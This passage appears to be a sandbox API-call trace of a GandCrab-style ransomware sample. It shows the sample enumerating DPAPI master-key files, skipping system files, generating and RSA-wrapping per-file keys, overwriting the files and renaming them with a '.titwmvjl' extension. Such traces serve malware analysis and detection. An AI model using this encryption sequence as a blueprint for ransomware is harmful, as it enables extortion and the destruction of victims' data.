lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="KRAB-DECRYPT.html") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="CRAB-DECRYPT.html") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="KRAB-DECRYPT.txt") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="CRAB-DECRYPT.txt") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="ntldr") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="NTDETECT.COM") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="Bootfont.bin") returned -1 [0073.127] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415") returned 138 [0073.127] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.127] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0073.128] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0073.128] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.128] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0073.128] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.129] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.129] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.129] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0073.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.129] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.129] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.130] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0073.130] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.130] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.131] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.131] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0073.131] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.131] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.131] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.131] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.131] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0073.132] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.132] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503338) returned 1 [0073.132] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.132] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0073.132] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.132] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0073.132] GetLastError () returned 0x0 [0073.132] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.133] CryptDestroyKey (hKey=0x503338) returned 1 [0073.133] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.133] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.133] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.133] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0073.133] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.133] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503738) returned 1 [0073.133] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.134] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0073.134] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.134] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0073.134] GetLastError () returned 0x0 [0073.134] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.134] CryptDestroyKey (hKey=0x503738) returned 1 [0073.134] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.134] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.134] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0073.134] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0073.135] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x1d4, lpOverlapped=0x0) returned 1 [0073.143] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.143] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x1d4, lpOverlapped=0x0) returned 1 [0073.144] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.145] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0073.156] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.160] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.160] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.160] CloseHandle (hObject=0x2cc) returned 1 [0073.161] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415.titwmvjl"), dwFlags=0x1) returned 1 [0073.162] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.162] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.162] lstrcmpW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2=".") returned 1 [0073.162] lstrcmpW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="..") returned 1 [0073.163] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="60b22e29-462b-4858-9592-1724c7ae07dd" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\60b22e29-462b-4858-9592-1724c7ae07dd") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\60b22e29-462b-4858-9592-1724c7ae07dd" [0073.163] lstrlenW (lpString=".titwmvjl") returned 9 [0073.163] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\60b22e29-462b-4858-9592-1724c7ae07dd") returned 138 [0073.163] VirtualAlloc (lpAddress=0x0, dwSize=0x154, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.163] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\60b22e29-462b-4858-9592-1724c7ae07dd.titwmvjl") returned 147 [0073.163] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\60b22e29-462b-4858-9592-1724c7ae07dd") returned 138 [0073.163] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\60b22e29-462b-4858-9592-1724c7ae07dd") returned 138 [0073.163] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\60b22e29-462b-4858-9592-1724c7ae07dd") returned 138 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="desktop.ini") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="autorun.inf") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="ntuser.dat") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="iconcache.db") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="bootsect.bak") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="boot.ini") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="ntuser.dat.log") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="thumbs.db") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="KRAB-DECRYPT.html") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="CRAB-DECRYPT.html") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="KRAB-DECRYPT.txt") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="CRAB-DECRYPT.txt") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="ntldr") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="NTDETECT.COM") returned -1 [0073.163] lstrcmpiW (lpString1="60b22e29-462b-4858-9592-1724c7ae07dd", lpString2="Bootfont.bin") returned -1 [0073.163] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\60b22e29-462b-4858-9592-1724c7ae07dd") returned 138 [0073.163] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.164] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\60b22e29-462b-4858-9592-1724c7ae07dd" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\60b22e29-462b-4858-9592-1724c7ae07dd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0073.164] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0073.164] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.164] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0073.164] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.165] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.165] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.165] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0073.165] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.165] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.165] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.165] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.165] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0073.166] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.166] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.166] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.166] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0073.166] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.166] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.166] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.167] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0073.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.167] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5034b8) returned 1 [0073.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.167] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0073.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.168] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0073.168] GetLastError () returned 0x0 [0073.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.168] CryptDestroyKey (hKey=0x5034b8) returned 1 [0073.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.168] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.168] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0073.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.169] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503578) returned 1 [0073.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.169] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0073.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.169] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0073.169] GetLastError () returned 0x0 [0073.170] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.170] CryptDestroyKey (hKey=0x503578) returned 1 [0073.170] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.170] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.170] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0073.170] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0073.170] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x1d4, lpOverlapped=0x0) returned 1 [0073.179] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.179] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x1d4, lpOverlapped=0x0) returned 1 [0073.180] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.180] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0073.182] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.185] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.185] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.186] CloseHandle (hObject=0x2cc) returned 1 [0073.187] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\60b22e29-462b-4858-9592-1724c7ae07dd" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\60b22e29-462b-4858-9592-1724c7ae07dd"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\60b22e29-462b-4858-9592-1724c7ae07dd.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\60b22e29-462b-4858-9592-1724c7ae07dd.titwmvjl"), dwFlags=0x1) returned 1 [0073.188] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.188] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.188] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0073.188] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0073.188] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock" [0073.188] lstrlenW (lpString=".titwmvjl") returned 9 [0073.188] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock") returned 126 [0073.188] VirtualAlloc (lpAddress=0x0, dwSize=0x13c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.188] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 135 [0073.188] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock") returned 126 [0073.188] lstrlenW (lpString=".lock") returned 5 [0073.188] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.188] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0073.188] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.189] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.189] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.189] lstrcmpW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2=".") returned 1 [0073.189] lstrcmpW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="..") returned 1 [0073.189] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="d7746ecf-458e-4e71-8557-8ac80457022a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a" [0073.189] lstrlenW (lpString=".titwmvjl") returned 9 [0073.189] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a") returned 138 [0073.189] VirtualAlloc (lpAddress=0x0, dwSize=0x154, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.189] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a.titwmvjl") returned 147 [0073.189] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a") returned 138 [0073.189] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a") returned 138 [0073.189] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a") returned 138 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="desktop.ini") returned -1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="autorun.inf") returned 1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="ntuser.dat") returned -1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="iconcache.db") returned -1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="bootsect.bak") returned 1 [0073.189] lstrcmpiW 